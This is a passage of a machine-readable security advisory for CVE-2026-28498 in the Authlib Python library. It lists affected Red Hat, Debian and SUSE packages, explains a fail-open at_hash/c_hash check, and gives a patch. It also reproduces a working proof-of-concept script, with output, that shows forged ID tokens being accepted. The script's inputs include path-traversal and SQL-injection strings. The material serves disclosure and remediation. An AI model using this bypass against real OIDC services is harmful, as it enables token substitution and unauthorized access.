"vers:rpm/unknown", "product_id": "CSAFPID-5068123" } } ], "category": "product_name", "name": "odh-workbench-jupyter-minimal-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068126" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222780" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068128" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068131" } } ], "category": "product_name", "name": "odh-workbench-jupyter-tensorflow-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5155538" } } ], "category": "product_name", "name": "odh-workbench-jupyter-tensorflow-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068134" } } ], "category": "product_name", "name": "odh-workbench-jupyter-trustyai-cpu-py312-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1455906" } } ], "category": "product_name", "name": "quay-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5355695" } } ], "category": "product_name", "name": "quay-rhel9" } ], "category": "product_family", "name": "Red Hat Quay 3" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<1.6.9", "product": { "name": "vers:unknown/<1.6.9", "product_id": "CSAFPID-5830119", "product_identification_helper": { "cpe": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "Authlib" } ], "category": "vendor", "name": "Authlib" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/unknown", "product": { "name": "vers:unknown/unknown", "product_id": "CSAFPID-1317174", "product_identification_helper": { "cpe": "cpe:/o:suse:suse_linux:-" } } } ], "category": "product_name", "name": "SuSE Linux" } ], "category": "vendor", "name": "SUSE" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<1.6.9", "product": { "name": "vers:unknown/<1.6.9", "product_id": "CSAFPID-5970752" } } ], "category": "product_name", "name": "authlib" } ], "category": "vendor", "name": "unknown" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1405217" } } ], "category": "product_name", "name": "python-authlib" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1405218" } } ], "category": "product_name", "name": "python-authlib" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-28498", "cwe": { "id": "CWE-354", "name": "Improper Validation of Integrity Check Value" }, "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "CSAFPID-5973066", "CSAFPID-5973067", "CSAFPID-5973068", "CSAFPID-5973069", "CSAFPID-5973070", "CSAFPID-5973071", "CSAFPID-5973072", "CSAFPID-5973073", "CSAFPID-5973074", "CSAFPID-5973075", "CSAFPID-5973076", "CSAFPID-5973077", "CSAFPID-5973078", "CSAFPID-5973079", "CSAFPID-5973080", "CSAFPID-5973081", "CSAFPID-5973082", "CSAFPID-5973083", "CSAFPID-5973084", "CSAFPID-5973085", "CSAFPID-5973086", "CSAFPID-5973087", "CSAFPID-5973088", "CSAFPID-5973089", "CSAFPID-5973090", "CSAFPID-5973091", "CSAFPID-5973092", "CSAFPID-5973066", "CSAFPID-5973067", "CSAFPID-5973068", "CSAFPID-5973069", "CSAFPID-5973070", "CSAFPID-5973071", "CSAFPID-5973072", "CSAFPID-5973073", "CSAFPID-5973074", "CSAFPID-5973075", "CSAFPID-5973078", "CSAFPID-5973079", "CSAFPID-5973080", "CSAFPID-5973081", "CSAFPID-5973082", "CSAFPID-5973083", "CSAFPID-5973084", "CSAFPID-5973085", "CSAFPID-5973086", "CSAFPID-5973087", "CSAFPID-5973088", "CSAFPID-5973089", "CSAFPID-5973090", "CSAFPID-5973091", "CSAFPID-5973092", "CSAFPID-5984227", "CSAFPID-5986174", "CSAFPID-5986175", "CSAFPID-5986176", "CSAFPID-5986177", "CSAFPID-5986178", "CSAFPID-5986179", "CSAFPID-5986180", "CSAFPID-5986181", "CSAFPID-5986182" ] } ], "notes": [ { "category": "description", "text": "## 1. Executive Summary\n\nA critical library-level vulnerability was identified in the **Authlib** Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (`_verify_hash`) responsible for validating the `at_hash` (Access Token Hash) and `c_hash` (Authorization Code Hash) claims exhibits a **fail-open** behavior when encountering an unsupported or unknown cryptographic algorithm. \n\nThis flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized `alg` header parameter. The library intercepts the unsupported state and silently returns `True` (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications.\n\n---\n\n## 2. Technical Details & Root Cause\n\nThe vulnerability resides within the `_verify_hash(signature, s, alg)` function in `authlib/oidc/core/claims.py`:\n\n```python\ndef _verify_hash(signature, s, alg):\n hash_value = create_half_hash(s, alg)\n if not hash_value: # ← VULNERABILITY: create_half_hash returns None for unknown algorithms\n return True # ← BYPASS: The verification silently passes\n return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\nWhen an unsupported algorithm string (e.g., `\"XX999\"`) is processed by the helper function `create_half_hash` in `authlib/oidc/core/util.py`, the internal `getattr(hashlib, hash_type, None)` call fails, and the function correctly returns `None`. \n\nHowever, instead of triggering a `Fail-Closed` cryptographic state (raising an exception or returning `False`), the `_verify_hash` function misinterprets the `None` return value and explicitly returns `True`. \n\nBecause developers rely on the standard `.validate()` method provided by Authlib's `IDToken` class—which internally calls this flawed function—there is **no mechanism for the implementing developer to prevent this bypass**. It is a strict library-level liability.\n\n---\n\n## 3. Attack Scenario\n\nThis vulnerability exposes applications utilizing Hybrid or Implicit OIDC flows to **Token Substitution Attacks**.\n\n1. An attacker initiates an OIDC flow and receives a legitimately signed ID Token, but wishes to substitute the bound Access Token (`access_token`) or Authorization Code (`code`) with a malicious or mismatched one.\n2. The attacker re-crafts the JWT header of the ID Token, setting the `alg` parameter to an arbitrary, unsupported value (e.g., `{\"alg\": \"CUSTOM_ALG\"}`).\n3. The server uses Authlib to validate the incoming token. The JWT signature validation might pass (or be previously cached/bypassed depending on state), progressing to the claims validation phase.\n4. Authlib attempts to validate the `at_hash` or `c_hash` claims. \n5. Because `\"CUSTOM_ALG\"` is unsupported by `hashlib`, `create_half_hash` returns `None`.\n6. Authlib's `_verify_hash` receives `None` and silently returns `True`.\n7. **Result:** The application accepts the substituted/malicious Access Token or Authorization Code without any cryptographic verification of the binding hash.\n\n---\n\n## 4. Specification & Standards Violations\n\nThis explicit fail-open behavior violates multiple foundational RFCs and Core Specifications. A secure cryptographic library **MUST** fail and reject material when encountering unsupported cryptographic parameters.\n\n**OpenID Connect Core 1.0**\n* **§ 3.2.2.9 (Access Token Validation):** \"If the ID Token contains an `at_hash` Claim, the Client MUST verify that the hash value of the Access Token matches the value of the `at_hash` Claim.\" Silencing the validation check natively contradicts this absolute requirement.\n* **§ 3.3.2.11 (Authorization Code Validation):** Identically mandates the verification of the `c_hash` Claim.\n\n**IETF JSON Web Token (JWT) Best Current Practices (BCP)**\n* **RFC 8725 § 3.1.1:** \"Libraries MUST NOT trust the signature without verifying it according to the algorithm... if validation fails, the token MUST be rejected.\" Authlib's implementation effectively \"trusts\" the hash when it cannot verify the algorithm.\n\n**IETF JSON Web Signature (JWS)**\n* **RFC 7515 § 5.2 (JWS Validation):** Cryptographic validations must reject the payload if the specified parameters are unsupported. By returning `True` for an `UnsupportedAlgorithm` state, Authlib violates robust application security logic.\n\n---\n\n## 5. Remediation Recommendation\n\nThe `_verify_hash` function must be patched to enforce a `Fail-Closed` posture. If an algorithm is unsupported and cannot produce a hash for comparison, the validation **must** fail immediately.\n\n**Suggested Patch (`authlib/oidc/core/claims.py`):**\n\n```python\ndef _verify_hash(signature, s, alg):\n hash_value = create_half_hash(s, alg)\n if hash_value is None:\n # FAIL-CLOSED: The algorithm is unsupported, reject the token.\n return False\n return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\n---\n\n## 6. Proof of Concept (PoC)\n\nThe following standalone script mathematically demonstrates the vulnerability across the Root Cause, Implicit Flow (`at_hash`), Hybrid Flow (`c_hash`), and the entire attack surface. It utilizes Authlib's own validation logic to prove the Fail-Open behavior.```bash\n\n```bash\npython3 -m venv venv\nsource venv/bin/activate\npip install authlib cryptography\npython3 -c \"import authlib; print(authlib.__version__)\"\n# → 1.6.8\n```\n\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@title OIDC at_hash / c_hash Verification Bypass\n@affected authlib <= 1.6.8\n@file authlib/oidc/core/claims.py :: _verify_hash()\n@notice _verify_hash() retorna True cuando create_half_hash() retorna\n None (alg no soportado), causando Fail-Open en la verificacion\n de binding entre ID Token y Access Token / Authorization Code.\n@dev Reproduce el bypass directamente contra el codigo de authlib\n sin mocks. Todas las llamadas son al modulo real instalado.\n\"\"\"\n\nimport hmac\nimport hashlib\nimport base64\nimport time\n\nimport authlib\nfrom authlib.common.encoding import to_bytes\nfrom authlib.oidc.core.util import create_half_hash\nfrom authlib.oidc.core.claims import IDToken, HybridIDToken\nfrom authlib.oidc.core.claims import _verify_hash as authlib_verify_hash\n\n# ─── helpers ──────────────────────────────────────────────────────────────────\n\nR = \"\\033[0m\"\nRED = \"\\033[91m\"\nGRN = \"\\033[92m\"\nYLW = \"\\033[93m\"\nCYN = \"\\033[96m\"\nBLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\n\ndef header(title):\n print(f\"\\n{CYN}{'─' * 64}{R}\")\n print(f\"{BLD}{title}{R}\")\n print(f\"{CYN}{'─' * 64}{R}\")\n\ndef ok(msg): print(f\" {GRN}[OK] {R}{msg}\")\ndef fail(msg): print(f\" {RED}[BYPASS] {R}{BLD}{msg}{R}\")\ndef info(msg): print(f\" {DIM} {msg}{R}\")\n\ndef at_hash_correct(token: str, alg: str) -> str:\n \"\"\"\n @notice Computa at_hash segun OIDC Core 1.0 s3.2.2.9.\n @param token Access token ASCII\n @param alg Algoritmo del header del ID Token\n @return str at_hash en Base64url sin padding\n \"\"\"\n fn = {\"256\": hashlib.sha256, \"384\": hashlib.sha384, \"512\": hashlib.sha512}\n digest = fn.get(alg[-3:], hashlib.sha256)(token.encode()).digest()\n return base64.urlsafe_b64encode(digest[:len(digest)//2]).rstrip(b\"=\").decode()\n\n\ndef _verify_hash_patched(signature: str, s: str, alg: str) -> bool:\n \"\"\"\n @notice Version corregida de _verify_hash() con semantica Fail-Closed.\n @dev Fix: `if not hash_value` -> `if hash_value is None`\n None es falsy en Python, pero b\"\" no lo es. El chequeo original\n no distingue entre \"algoritmo no soportado\" y \"hash vacio\".\n \"\"\"\n hash_value = create_half_hash(s, alg)\n if hash_value is None:\n return False\n return hmac.compare_digest(hash_value, to_bytes(signature))\n\n# ─── test 1: root cause ───────────────────────────────────────────────────────\n\ndef test_root_cause():\n \"\"\"\n @notice Demuestra que create_half_hash() retorna None para alg desconocido\n y que _verify_hash() interpreta ese None como verificacion exitosa.\n \"\"\"\n header(\"TEST 1 - Root Cause: create_half_hash() + _verify_hash()\")\n\n token = \"real_access_token_from_AS\"\n fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n alg = \"CUSTOM_ALG\"\n\n half_hash = create_half_hash(token, alg)\n info(f\"create_half_hash(token, {alg!r}) -> {half_hash!r} (None = alg no soportado)\")\n\n result_vuln = authlib_verify_hash(fake_sig, token, alg)\n result_patched = _verify_hash_patched(fake_sig, token, alg)\n\n print()\n if result_vuln:\n fail(f\"authlib _verify_hash() retorno True con firma falsa y alg={alg!r}\")\n else:\n ok(f\"authlib _verify_hash() retorno False\")\n\n if not result_patched:\n ok(f\"_verify_hash_patched() retorno False (fail-closed correcto)\")\n else:\n fail(f\"_verify_hash_patched() retorno True\")\n\n# ─── test 2: IDToken.validate_at_hash() bypass ────────────────────────────────\n\ndef test_at_hash_bypass():\n \"\"\"\n @notice Demuestra el bypass end-to-end en IDToken.validate_at_hash().\n El atacante modifica el header alg del JWT a un valor no soportado.\n validate_at_hash() no levanta excepcion -> token aceptado.\n\n @dev Flujo real de authlib:\n validate_at_hash() -> _verify_hash(at_hash, access_token, alg)\n -> create_half_hash(access_token, \"CUSTOM_ALG\") -> None\n -> `if not None` -> True -> no InvalidClaimError -> BYPASS\n \"\"\"\n header(\"TEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\")\n\n real_token = \"ya29.LEGITIMATE_token_from_real_AS\"\n evil_token = \"ya29.MALICIOUS_token_under_attacker_control\"\n fake_at_hash = \"FAAAAAAAAAAAAAAAAAAAA\"\n\n # --- caso A: token legitimo con alg correcto ---\n correct_hash = at_hash_correct(real_token, \"RS256\")\n token_legit = IDToken(\n {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n \"at_hash\": correct_hash},\n {\"access_token\": real_token}\n )\n token_legit.header = {\"alg\": \"RS256\"}\n\n try:\n token_legit.validate_at_hash()\n ok(f\"Caso A (legitimo, RS256): at_hash={correct_hash} -> aceptado\")\n except Exception as e:\n fail(f\"Caso A rechazo el token legitimo: {e}\")\n\n # --- caso B: token malicioso con alg forjado ---\n token_forged = IDToken(\n {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n \"at_hash\": fake_at_hash},\n {\"access_token\": evil_token}\n )\n token_forged.header = {\"alg\": \"CUSTOM_ALG\"}\n\n try:\n token_forged.validate_at_hash()\n fail(f\"Caso B (atacante, alg=CUSTOM_ALG): at_hash={fake_at_hash} -> BYPASS exitoso\")\n info(f\"access_token del atacante aceptado: {evil_token}\")\n except Exception as e:\n ok(f\"Caso B rechazado correctamente: {e}\")\n\n# ─── test 3: HybridIDToken.validate_c_hash() bypass ──────────────────────────\n\ndef test_c_hash_bypass():\n \"\"\"\n @notice Mismo bypass pero para c_hash en Hybrid Flow.\n Permite Authorization Code Substitution Attack.\n @dev OIDC Core 1.0 s3.3.2.11 exige verificacion obligatoria de c_hash.\n Authlib la omite cuando el alg es desconocido.\n \"\"\"\n header(\"TEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\")\n\n real_code = \"SplxlOBeZQQYbYS6WxSbIA\"\n evil_code = \"ATTACKER_FORGED_AUTH_CODE\"\n fake_chash = \"ZZZZZZZZZZZZZZZZZZZZZZ\"\n\n token = HybridIDToken(\n {\"iss\": \"https://idp.example.com\", \"sub\": \"user\", \"aud\": \"client\",\n \"exp\": int(time.time()) + 3600, \"iat\": int(time.time()),\n \"nonce\": \"n123\", \"at_hash\": \"AAAA\", \"c_hash\": fake_chash},\n {\"code\": evil_code, \"access_token\": \"sometoken\"}\n )\n token.header = {\"alg\": \"XX9999\"}\n\n try:\n token.validate_c_hash()\n fail(f\"c_hash={fake_chash!r} aceptado con alg=XX9999 -> Authorization Code Substitution posible\")\n info(f\"code del atacante aceptado: {evil_code}\")\n except Exception as e:\n ok(f\"Rechazado correctamente: {e}\")\n\n# ─── test 4: superficie de ataque ─────────────────────────────────────────────\n\ndef test_attack_surface():\n \"\"\"\n @notice Mapea todos los valores de alg que disparan el bypass.\n @dev create_half_hash hace: getattr(hashlib, f\"sha{alg[2:]}\", None)\n Cualquier string que no resuelva a un atributo de hashlib -> None -> bypass.\n \"\"\"\n header(\"TEST 4 - Superficie de Ataque\")\n\n token = \"test_token\"\n fake_sig = \"AAAAAAAAAAAAAAAAAAAAAA\"\n\n vectors = [\n \"CUSTOM_ALG\", \"XX9999\", \"none\", \"None\", \"\", \"RS\", \"SHA256\",\n \"HS0\", \"EdDSA256\", \"PS999\", \"RS 256\", \"../../../etc\", \"' OR '1'='1\",\n ]\n\n print(f\" {'alg':<22} {'half_hash':<10} resultado\")\n print(f\" {'-'*22} {'-'*10} {'-'*20}\")\n\n for alg in vectors:\n hv = create_half_hash(token, alg)\n result = authlib_verify_hash(fake_sig, token, alg)\n hv_str = \"None\" if hv is None else \"bytes\"\n res_str = f\"{RED}BYPASS{R}\" if result else f\"{GRN}OK{R}\"\n print(f\" {alg!r:<22} {hv_str:<10} {res_str}\")\n\n# ─── main ─────────────────────────────────────────────────────────────────────\n\nif __name__ == \"__main__\":\n print(f\"\\n{BLD}authlib {authlib.__version__} - OIDC Hash Verification Bypass PoC{R}\")\n print(f\"authlib/oidc/core/claims.py :: _verify_hash() \\n\")\n\n test_root_cause()\n test_at_hash_bypass()\n test_c_hash_bypass()\n test_attack_surface()\n\n print(f\"\\n{DIM}Fix: `if not hash_value` -> `if hash_value is None` en _verify_hash(){R}\\n\")\n```\n\n---\n\n## Output\n\n```bash\nuthlib 1.6.8 - OIDC Hash Verification Bypass PoC\nauthlib/oidc/core/claims.py :: _verify_hash() \n\n\n────────────────────────────────────────────────────────────────\nTEST 1 - Root Cause: create_half_hash() + _verify_hash()\n────────────────────────────────────────────────────────────────\n create_half_hash(token, 'CUSTOM_ALG') -> None (None = alg no soportado)\n\n [BYPASS] authlib _verify_hash() retorno True con firma falsa y alg='CUSTOM_ALG'\n [OK] _verify_hash_patched() retorno False (fail-closed correcto)\n\n────────────────────────────────────────────────────────────────\nTEST 2 - IDToken.validate_at_hash() Bypass (Implicit / Hybrid Flow)\n────────────────────────────────────────────────────────────────\n [OK] Caso A (legitimo, RS256): at_hash=gh_beqqliVkRPAXdOz2Gbw -> aceptado\n [BYPASS] Caso B (atacante, alg=CUSTOM_ALG): at_hash=FAAAAAAAAAAAAAAAAAAAA -> BYPASS exitoso\n access_token del atacante aceptado: ya29.MALICIOUS_token_under_attacker_control\n\n────────────────────────────────────────────────────────────────\nTEST 3 - HybridIDToken.validate_c_hash() Bypass (Hybrid Flow)\n────────────────────────────────────────────────────────────────\n [BYPASS] c_hash='ZZZZZZZZZZZZZZZZZZZZZZ' aceptado con alg=XX9999 -> Authorization Code Substitution posible\n code del atacante aceptado: ATTACKER_FORGED_AUTH_CODE\n\n────────────────────────────────────────────────────────────────\nTEST 4 - Superficie de Ataque\n────────────────────────────────────────────────────────────────\n alg half_hash resultado\n ---------------------- ---------- --------------------\n 'CUSTOM_ALG' None BYPASS\n 'XX9999' None BYPASS\n 'none' None BYPASS\n 'None' None BYPASS\n '' None BYPASS\n 'RS' None BYPASS\n 'SHA256' None BYPASS\n 'HS0' None BYPASS\n 'EdDSA256' None BYPASS\n 'PS999' None BYPASS\n 'RS 256' None BYPASS\n '../../../etc' None BYPASS\n \"' OR '1'='1\" None BYPASS\n\nFix: `if not hash_value` -> `if hash_value is None` en _verify_hash()\n```", "title": "github - https://github.com/advisories/GHSA-m344-f55w-2m6j" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-28498" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-28498" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.\nThis IMPORTANT vulnerability in Authlib allows attackers to bypass OIDC ID Token integrity verification. The at_hash and c_hash validation fails open for unknown algorithms, accepting forged tokens as valid. Exploitation requires no authentication or user interaction. Impact is high to confidentiality and integrity. Red Hat products using Authlib for OIDC validation are affected. Fixed in version 1.6.9.", "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-28498" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-28498" }, { "category": "description", "text": "## 1. Executive Summary\n\nA critical library-level vulnerability was identified in the **Authlib** Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (`_verify_hash`) responsible for validating the `at_hash` (Access Token Hash) and `c_hash` (Authorization Code Hash) claims exhibits a **fail-open** behavior when encountering an unsupported or unknown cryptographic algorithm. \n\nThis flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized `alg` header parameter. The library intercepts the unsupported state and silently returns `True` (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications.\n\n---\n\n## 2. Technical Details & Root Cause\n\nThe vulnerability resides within the `_verify_hash(signature, s, alg)` function in `authlib/oidc/core/claims.py`:\n\n```python\ndef _verify_hash(signature, s, alg):\n hash_value = create_half_hash(s, alg)\n if not hash_value: # ← VULNERABILITY: create_half_hash returns None for unknown algorithms\n return True # ← BYPASS: The verification silently passes\n return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\nWhen an unsupported algorithm string (e.g., `\"XX999\"`) is processed by the helper function `create_half_hash` in `authlib/oidc/core/util.py`, the internal `getattr(hashlib, hash_type, None)` call fails, and the function correctly returns `None`. \n\nHowever, instead of triggering a `Fail-Closed` cryptographic state (raising an exception or returning `False`), the `_verify_hash` function misinterprets the `None` return value and explicitly returns `True`. \n\nBecause developers rely on the standard `.validate()` method provided by Authlib's `IDToken` class—which internally calls this flawed function—there is **no mechanism for the implementing developer to prevent this bypass**. It is a strict library-level liability.\n\n---\n\n## 3. Attack Scenario\n\nThis vulnerability exposes applications utilizing Hybrid or Implicit OIDC flows to **Token Substitution Attacks**.\n\n1. An attacker initiates an OIDC flow and receives a legitimately signed ID Token, but wishes to substitute the bound Access Token (`access_token`) or Authorization Code (`code`) with a malicious or mismatched one.\n2. The attacker re-crafts the JWT header of the ID Token, setting the `alg` parameter to an arbitrary, unsupported value (e.g., `{\"alg\": \"CUSTOM_ALG\"}`).\n3. The server uses Authlib to validate the incoming token. The JWT signature validation might pass (or be previously cached/bypassed depending on state), progressing to the claims validation phase.\n4. Authlib attempts to validate the `at_hash` or `c_hash` claims. \n5. Because `\"CUSTOM_ALG\"` is unsupported by `hashlib`, `create_half_hash` returns `None`.\n6. Authlib's `_verify_hash` receives `None` and silently returns `True`.\n7. **Result:** The application accepts the substituted/malicious Access Token or Authorization Code without any cryptographic verification of the binding hash.\n\n---\n\n## 4. Specification & Standards Violations\n\nThis explicit fail-open behavior violates multiple foundational RFCs and Core Specifications. A secure cryptographic library **MUST** fail and reject material when encountering unsupported cryptographic parameters.\n\n**OpenID Connect Core 1.0**\n* **§ 3.2.2.9 (Access Token Validation):** \"If the ID Token contains an `at_hash` Claim, the Client MUST verify that the hash value of the Access Token matches the value of the `at_hash` Claim.\" Silencing the validation check natively contradicts this absolute requirement.\n* **§ 3.3.2.11 (Authorization Code Validation):** Identically mandates the verification of the `c_hash` Claim.\n\n**IETF JSON Web Token (JWT) Best Current Practices (BCP)**\n* **RFC 8725 § 3.1.1:** \"Libraries MUST NOT trust the signature without verifying it according to the algorithm... if validation fails, the token MUST be rejected.\" Authlib's implementation effectively \"trusts\" the hash when it cannot verify the algorithm.\n\n**IETF JSON Web Signature (JWS)**\n* **RFC 7515 § 5.2 (JWS Validation):** Cryptographic validations must reject the payload if the specified parameters are unsupported. By returning `True` for an `UnsupportedAlgorithm` state, Authlib violates robust application security logic.\n\n---\n\n## 5. Remediation Recommendation\n\nThe `_verify_hash` function must be patched to enforce a `Fail-Closed` posture. If an algorithm is unsupported and cannot produce a hash for comparison, the validation **must** fail immediately.\n\n**Suggested Patch (`authlib/oidc/core/claims.py`):**\n\n```python\ndef _verify_hash(signature, s, alg):\n hash_value = create_half_hash(s, alg)\n if hash_value is None:\n # FAIL-CLOSED: The algorithm is unsupported, reject the token.\n return False\n return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\n---\n\n## 6. Proof of Concept (PoC)\n\nThe following standalone script mathematically demonstrates the vulnerability across the Root Cause, Implicit Flow (`at_hash`), Hybrid Flow (`c_hash`), and the entire attack surface. It utilizes Authlib's own validation logic to prove the Fail-Open behavior.```bash\n\n```bash\npython3 -m venv venv\nsource venv/bin/activate\npip install authlib cryptography\npython3 -c \"import authlib; print(authlib.__version__)\"\n# → 1.6.8\n```\n\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@title OIDC at_hash / c_hash Verification Bypass\n@affected authlib <= 1.6.8\n@file authlib/oidc/core/claims.py :: _verify_hash()\n@notice _verify_hash() retorna True cuando create_half_hash() retorna\n None (alg no soportado), causando Fail-Open en la verificacion\n de binding entre ID Token y Access Token / Authorization Code.\n@dev Reproduce el bypass directamente contra el codigo de authlib\n sin mocks. Todas las llamadas son al modulo real instalado.\n\"\"\"\n\nimport hmac\nimport hashlib\nimport base64\nimport time\n\nimport authlib\nfrom authlib.common.encoding import to_bytes\nfrom authlib.oidc.core.util import create_half_hash\nfrom authlib.oidc.core.claims import IDToken, HybridIDToken\nfrom authlib.oidc.core.claims import _verify_hash as authlib_verify_hash\n\n# ─── helpers ──────────────────────────────────────────────────────────────────\n\nR = \"\\033[0m\"\nRED = \"\\033[91m\"\nGRN = \"\\033[92m\"\nYLW = \"\\033[93m\"\nCYN = \"\\033[96m\"\nBLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\n\ndef header(title):\n print(f\"\\n{CYN}{'─' * 64}{R}\")\n print(f\"{BLD}{title}{R}\")\n print(f\"{CYN}{'─' * 64}{R}\")\n\ndef ok(msg): print(f\" {GRN}[OK] {R}{msg}\")\ndef fail(msg): print(f\" {RED}[BYPASS] {R}{BLD}{msg}{R}\")\ndef info(msg): print(f\" {DIM} {msg}{R}\")\n\ndef at_hash_correct(token: str, alg: str) -> str:\n \"\"\"\n @notice Computa at_hash segun OIDC Core 1.0 s3.2.2.9.\n @param token Access token ASCII\n @param alg Algoritmo del header del ID Token\n @return str at_hash en Base64url sin padding\n \"\"\"\n fn = {\"256\": hashlib.sha256, \"384\": hashlib.sha384, \"512\": hashlib.sha512}\n digest = fn.get(alg[-3:], hashlib.sha256)(token.encode()).digest()\n return base64.urlsafe_b64encode(digest[:len(digest)//2]).rstrip(b\"=\").decode()\n\n\ndef _verify_hash_patched(signature: str, s: str, alg: str) -> bool:\n \"\"\"\n @notice Version corregida de _verify_hash() con semantica Fail-Closed.\n @dev Fix: `if not hash_value` -> `if hash_value is None`\n None es falsy en Python, pero b\"\" no lo es. El chequeo original\n no distingue entre \"algoritmo no soportado\" y \"hash vacio\".\n \"\"\"\n hash_value = create_half_hash(s, alg)\n if hash_value is None:\n return False\n return hmac.compare_digest(hash_value, to_bytes(signature))\n\n# ─── test 1: root cause ───────────────────────────────────────────────────────\n\ndef test_root_cause():\n \"\"\"\n @notice Demuestra que create_half_hash() retorna None para alg desconocido\n y que _verify_hash() interpreta ese None como verificacion exitosa.\n \"\"\"\n header(\"TEST 1 - Root Cause: create_half_hash() + _verify_hash()\")\n\n token = 